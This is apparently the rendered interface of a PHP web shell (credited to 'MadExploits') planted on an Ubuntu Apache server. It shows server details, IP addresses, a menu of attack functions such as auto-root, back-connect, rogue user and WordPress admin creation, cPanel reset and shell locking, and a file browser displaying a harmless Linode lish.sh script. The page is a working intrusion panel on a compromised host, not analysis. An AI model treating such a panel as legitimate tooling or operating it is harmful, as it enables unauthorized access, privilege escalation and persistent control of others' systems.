Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.99
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
profile.d /
[ HOME SHELL ]
Name
Size
Permission
Action
01-locale-fix.sh
96
B
-rw-r--r--
Z97-byobu.sh
1.52
KB
-rw-r--r--
Z99-cloud-locale-test.sh
3.34
KB
-rwxr-xr-x
Z99-cloudinit-warnings.sh
873
B
-rwxr-xr-x
apps-bin-path.sh
835
B
-rw-r--r--
bash_completion.sh
729
B
-rw-r--r--
cedilla-portuguese.sh
1003
B
-rw-r--r--
gawk.csh
1.08
KB
-rw-r--r--
gawk.sh
757
B
-rw-r--r--
lish.sh
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lish.sh
# shellcheck shell=bash #################################################################### # # # This file is provided by Linode. # # # # In order for Lish to be able to handle screen resizes correctly, # # we define this function to determine and set the correct # # geometry and call it each time the prompt is displayed. # # (only when logging in via the Lish serial console) # # # #################################################################### [ -z "${PS1}" ] && return [ -z "${BASH_VERSION}" ] && return lish_resize() { local IFS='[;' escape geometry x y # Disable echo and output ANSI terminal sequence. stty -echo echo -ne '\x1b7\x1b[r\x1b[900;900H\x1b[6n\x1b8\x1b[?7h' # Read the ANSI response from the terminal. # shellcheck disable=SC2034 read -rsd R escape geometry # Columns x="${geometry##*;}" x="${x%R*}" # Rows y="${geometry%%;*}" y="${y#*[}" # Restore echo, and set columns, rows, and sane settings. stty sane cols "${x}" rows "${y}" } if [ "$(tty)" = '/dev/ttyS0' ]; then PROMPT_COMMAND=lish_resize lish_resize fi
Close